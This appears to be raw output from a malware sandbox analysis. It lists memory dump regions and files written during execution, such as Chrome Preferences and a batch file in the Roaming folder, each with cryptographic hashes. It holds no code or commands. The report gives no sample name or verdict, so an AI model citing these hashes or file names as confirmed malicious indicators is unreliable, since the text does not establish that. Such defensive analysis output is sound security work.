memory/6468-1394-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1393-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1392-0x00007FFDA6750000-0x00007FFDA6759000-memory.dmp
memory/6468-1391-0x00007FFDA6730000-0x00007FFDA6740000-memory.dmp
memory/6468-1390-0x00007FFDA6730000-0x00007FFDA6740000-memory.dmp
memory/6468-1389-0x00007FFDA6730000-0x00007FFDA6740000-memory.dmp
memory/6468-1388-0x00007FFDA7C70000-0x00007FFDA7C7D000-memory.dmp
memory/6468-1387-0x00007FFDA7C70000-0x00007FFDA7C7D000-memory.dmp
memory/6468-1386-0x00007FFDA7C70000-0x00007FFDA7C7D000-memory.dmp
memory/6468-1385-0x00007FFDA7C70000-0x00007FFDA7C7D000-memory.dmp
memory/6468-1384-0x00007FFDA7C70000-0x00007FFDA7C7D000-memory.dmp
memory/6468-1383-0x00007FFDA7C30000-0x00007FFDA7C40000-memory.dmp
memory/6468-1382-0x00007FFDA7C30000-0x00007FFDA7C40000-memory.dmp
memory/6468-1381-0x00007FFDA7BC0000-0x00007FFDA7BD0000-memory.dmp
memory/6468-1380-0x00007FFDA7BC0000-0x00007FFDA7BD0000-memory.dmp
memory/6468-1378-0x00007FFDA5CD0000-0x00007FFDA5CE0000-memory.dmp
memory/6468-1377-0x00007FFDA5CD0000-0x00007FFDA5CE0000-memory.dmp
memory/6468-1376-0x00007FFDA5CB0000-0x00007FFDA5CC0000-memory.dmp
memory/6468-1375-0x00007FFDA5CB0000-0x00007FFDA5CC0000-memory.dmp
memory/6468-1374-0x00007FFDA5CB0000-0x00007FFDA5CC0000-memory.dmp
memory/6468-1373-0x00007FFDA5B00000-0x00007FFDA5B10000-memory.dmp
memory/6468-1372-0x00007FFDA5B00000-0x00007FFDA5B10000-memory.dmp
memory/6468-1371-0x00007FFDA5990000-0x00007FFDA59A0000-memory.dmp
memory/6468-1370-0x00007FFDA5990000-0x00007FFDA59A0000-memory.dmp
memory/6468-1368-0x00007FFDA63C0000-0x00007FFDA63E0000-memory.dmp
memory/6468-1367-0x00007FFDA63C0000-0x00007FFDA63E0000-memory.dmp
memory/6468-1366-0x00007FFDA63C0000-0x00007FFDA63E0000-memory.dmp
memory/6468-1365-0x00007FFDA63C0000-0x00007FFDA63E0000-memory.dmp
memory/6468-1364-0x00007FFDA63C0000-0x00007FFDA63E0000-memory.dmp
memory/6468-1363-0x00007FFDA63A0000-0x00007FFDA63B0000-memory.dmp
memory/6468-1362-0x00007FFDA63A0000-0x00007FFDA63B0000-memory.dmp
memory/6468-1361-0x00007FFDA6310000-0x00007FFDA6320000-memory.dmp
memory/6468-1360-0x00007FFDA6310000-0x00007FFDA6320000-memory.dmp
memory/6468-1355-0x00007FFDA83B0000-0x00007FFDA83E0000-memory.dmp
memory/6468-1354-0x00007FFDA83B0000-0x00007FFDA83E0000-memory.dmp
memory/6468-1353-0x00007FFDA8360000-0x00007FFDA8370000-memory.dmp
memory/6468-1352-0x00007FFDA8360000-0x00007FFDA8370000-memory.dmp
memory/6468-1351-0x00007FFDA8240000-0x00007FFDA8250000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ef6ae4a1f9b55d1a6b619b043b3e5e18 |
| SHA1 | 9d6a65f7b851359f69c3dbe9afb2b96790bd783d |
| SHA256 | f917af07963ad4931312ba7e86e5621b24cf1b1940b4498f3d28767486bd3fa7 |
| SHA512 | 9da9c90fe5c06ce403b1b41646a6ef4ced56cd9de49fb65aa3d70e5c1fe4139ac64622df2504092ec7ba93184effdd9a4628bf98b29f9dbdb43a5f4f0d8d15b5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2410e6b734c63492e97fabd8dd48aa8f |
| SHA1 | 258177f5e8ac6cd4921b857fb4f7f7765ea36fa7 |
| SHA256 | e7263cb2a64ebd104fc227eac6a1f85f20b3c8eae035018b533099e2b89b30cb |
| SHA512 | 9c6f307f2e14c2bcfb76da48359b5383b93980312444bf64b19a978745b31fe4411faa5c9a6a2b612ff5e2de4a4b41e342c68992ea9b81cbd34d9e2cb704135c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9eb5e243e1316423fe8c84892e43944f |
| SHA1 | 5a68a300291552a768791280df95212a752bb24b |
| SHA256 | 6400a56ac39992d4679f27edf65e6ed7e06b43e4fd9a0666e855628dee28d35b |
| SHA512 | 36440ee587ff34079e470d3db47e783c43f4cac010e38d70b862e1e0fbf27ace5a13548bfe469e4f8a0d54bd07fa3f30d05002622c71649035bb7181d083d3a9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4d7e4b4ff9e259d5d5bcf31f2362cbc7 |
| SHA1 | 3b6423e8983675e236b751d941305685d6b91391 |
| SHA256 | dec9c6ec8ee90ae22efbbc1407225634698b721e3695e36dcbff8701b4afd7a7 |
| SHA512 | 3b290bc36028e0d8c6036ebe27f66da3e7c670ace95855ffc07330df4234ecb5342746395db1286c2ca8d178c04b9cb339427a0a7cfbadd664419350f9116eb6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4ac1013b6f32345fc16aada55bf3a1ff |
| SHA1 | 0fe0c4ea1fa9dd45cffbac2caca4048204cf783f |
| SHA256 | b77386e08968dd1f0f5b83923d477518a58c5097f34ee0deca8210efa7b03a4a |
| SHA512 | 256c61822ad904420b13f52ecdebbae5593225d9bc38319ddc1ea022cdd9d0a5e90d8021923f8857c9b20132165c31cff9e7ec569d1aeccc7d799faa3b93ec7d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 04ad01802ecfdab138506bafb3048ffa |
| SHA1 | 7758ffa9d41276b0235f182fd1dc89889301df7c |
| SHA256 | 49bdc2c0936793ec84851d9caef31f3198a5a1f021c95cc88752f6ce6ac2aa4d |
| SHA512 | cf2a75fc5b7f1aa81ba790e5b1d2e66c0057eb0eda4421eb55240bce25807f858df122ef34eaa3c4a1ecaf3f38c73c423f7df4ec02caf918aedfdfe0598767f0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0298fe42bd8d50e330e3ee1cee3f7a9f |
| SHA1 | d62d825415a492b4a70f32d8b686d3d72eef3ca4 |
| SHA256 | 77d957da7096efd10440efbb61b9a335bd0ebe8dffa53d30dc81a79ee0c8ea64 |
| SHA512 | 5c7a3ae5b3e026eb8a8edd5b36763135b4e6a8403804623517844211e42511976a822c03d4654742fcee8870a8cb3f0cc49b8a4aeb91dff2b7ca69fe67439bcc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a1687a1833aeace3e5b66f6bc66c492b |
| SHA1 | 0f8e4afe1f403230a71b62e151b022ffac399845 |
| SHA256 | 76ad965de5882e4a2cb0284ee95c265ad3f3f5408803c0fbbb8a5e6924151b98 |
| SHA512 | b50adc4ae5888259b7f4123786e93c696ebad845582eb954e92509f3d958adca92d6b4e646abf8e47d48a17709879b22f66f205de137e818d3c8f1106199fc54 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3804ead7d5595b74cd77c8eca42223ee |
| SHA1 | c2e37affbd4d735636c1a34be7e077d8af846527 |
| SHA256 | a7c7e93866afa5314225cb9f3153a795974ae31c16dd0c4b98c49554abdd1504 |
| SHA512 | a7c691cdf17e148b5d5279e7d2988109905d8dde359e4d479704e8ca177b6c30a4a00a37a88e24d475f887817c43d5d690409ecf66f412e3e6a94b97c5714bc3 |
memory/5984-1595-0x00000000010D0000-0x00000000010D8000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 81eeeb4fde449a14c7907ec3edbe86f0 |
| SHA1 | 2d56fe66204cf3281b54e890d75bffc2cdbee249 |
| SHA256 | 406d586edb3fd7a40e04e35dbaedf2e8c9bb72e1f54a5893c595732e4539e6a2 |
| SHA512 | 4a7ecaf0177f6cc335d8122ee3cf370b112af6286bf270e6b635aa0b6dc2b6f234aa6df8ffae71c68d1ba5b520c365bd9ed66cfbb24786a87584c95781f1453e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 849e9413ca310be662c206325395113e |
| SHA1 | abd472d69fa2da751fa668bee4b25b3959b0d242 |
| SHA256 | 7a04b9791d82451906467b4ad9b09becbedd625be0e2c20a88ab3aa04b127b74 |
| SHA512 | 1da6c11fb823fd58257c90b18dac7e3ff6927ac4601fca35c7fc5994e96f65450138656c1f48c58afee1dd7b34989882d593f80e2effde46c3468085bca9b2bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9d39977e1a7dbde22382fca393acb830 |
| SHA1 | 6ac837f5991e37a86c3ae7fe47b4328871b79afc |
| SHA256 | 06502cc068fa98da3fedbf5f49702959c8549e7be19767cf5fb7811631f17a14 |
| SHA512 | 7eaf5b63798d044f4a280c857361f1cc855aff078986d3352351f16f2eded1da1a9b2c8c04525022d916bd1ec3bfb2c7206721667b067c6e4ae9090c0e260dd2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 11fce0c28594caf5193bfa9f6671f826 |
| SHA1 | 5e798f7396e2649206287dd43efd325138366dd0 |
| SHA256 | d310f91adca2260bbc3daf37ce7d76c7c492c57fb3d9f15040c5d27b5b6113e1 |
| SHA512 | 801bc3fe329138ffecc3030ab63d995a18952f9993f9e5cb986f840f8c81d0299dab586bf922a209da597e2ea65f007ca6895ec47eee1507eb15ed02c8ebce13 |
memory/1560-1648-0x0000000002AF0000-0x0000000002B26000-memory.dmp
memory/1560-1649-0x0000000005360000-0x000000000598A000-memory.dmp
memory/1560-1659-0x0000000005190000-0x00000000051F6000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 917143148a367e7beb525462e9b00e30 |
| SHA1 | 556c683bde88e3cbdd34ac168eeb497e0e9820f6 |
| SHA256 | 15929fc032bff61cc514feda5ddf8a10340f32b231332ecdb7d390203cec1535 |
| SHA512 | a4edc6c4fc2781b87d3cf520ec2e46200b0b6d63cf5d25ae799ed1e36751ea4e98042dacb47b959923424d3f664c988ea9048ee515465f141879925005e5f326 |
memory/1560-1660-0x0000000005990000-0x00000000059F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0m5t4o5m.1ew.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1560-1669-0x0000000005EB0000-0x0000000005ECE000-memory.dmp
memory/1560-1670-0x0000000005EE0000-0x0000000005F2C000-memory.dmp
memory/1560-1671-0x0000000006420000-0x0000000006466000-memory.dmp
memory/1560-1672-0x0000000007870000-0x0000000007EEA000-memory.dmp
memory/1560-1673-0x0000000007220000-0x000000000723A000-memory.dmp
memory/1560-1674-0x0000000007280000-0x0000000007288000-memory.dmp
memory/1560-1675-0x0000000007290000-0x000000000729E000-memory.dmp
memory/452-1685-0x00000000075C0000-0x00000000075F4000-memory.dmp
memory/452-1686-0x000000006E860000-0x000000006E8AC000-memory.dmp
memory/452-1695-0x0000000007580000-0x000000000759E000-memory.dmp
memory/452-1696-0x0000000007600000-0x00000000076A4000-memory.dmp
memory/452-1697-0x00000000077D0000-0x00000000077DA000-memory.dmp
memory/452-1698-0x00000000079E0000-0x0000000007A76000-memory.dmp
memory/452-1699-0x0000000007960000-0x0000000007971000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows_Log_307.bat
| MD5 | 73185cc41ba3471aaaec0e5dd09dc6fd |
| SHA1 | 70be4e536f14a56399f83f10a67aca63af711a32 |
| SHA256 | cd73b10d09d9a71ffabb0fd22bf7612d3dfc18cc0ce772c8a866cb8a61a8bbb6 |
| SHA512 | d216117782b82093fd8912f25874d04bd96a753f8b2684c3d34d46420ddf1c366766b57efdab907f7c1d689076d178a7ff19118afe792ec5e8614af0c48cb28d |
memory/3804-1714-0x00000000078A0000-0x00000000078B0000-memory.dmp
memory/3804-1715-0x0000000007950000-0x00000000079EC000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3ddc299c5727a46f099420d244c14a7d |
| SHA1 | ac9c2273177e56fe1af0fe1da018c810ba6c1033 |
| SHA256 | 4d0b8c3bbe5f575494b66d3b67ecbe509afa926f10c937ed9e37dbac77fc1065 |
| SHA512 | 31cb07c6b4007b2df4383eff4c9683edd3ce723f96db05f7866d312a1fd7c8ebc5c71b3ca1f75149940da348cbcb74eb855ef0c6d3983217c2b4e8b34452f1ff |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f07586e9a9d08eb9b089f6ec10a57d8f |
| SHA1 | 752779bf6875c6ed2a79aa0004012d8c1b0a2d86 |
| SHA256 | 3045eeea2326456486ccb9c0c0ab0a6773e9a10fe70550b6be3c4fb7c524bffd |
| SHA512 | 283418c481466be076f1e537093fbcc150678c6d1fb94be067b8afc4ae200d8c8f2339aee6424a64683a2b735f8b938fbd64d0846780938a14ca33c2b50494f6 |
memory/2296-1829-0x000000006E860000-0x000000006E8AC000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a665e1d1c0c245092e1d2b66dd1f07ac |
| SHA1 | b9669350d3c66fbdc1d5f8fff7d745ee55b33113 |
| SHA256 | f41b9f610806c67b69a9290540113de16d4508ff74bb7c7bc4cac809410a0222 |
| SHA512 | 54997ec7740c800061533d8ad3282604ac6ed719e2025d822dccf7b9e3fe6d3c87f182a86b4f1fb1772a06c0e60286905b5850004933ced1b150b07608982d3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | edb343aa8d00895022ab71a4dad0bb7e |
| SHA1 | 55cd00a96f5fd2c62c3af06bf5ddc10dc6637f7b |
| SHA256 | e901aff6d89a5b7ae402e0777ba1486f96de24aa8213bbff2d6b9580c3896eb4 |
| SHA512 | 98402ad50e95f8e616ed785b11f75ebe90464c6fc668c1f79b8f0ca008845693694ef7e32be19b881c33b399ae0abe1afc0bf2e84acbbf62142f3a1764a75580 |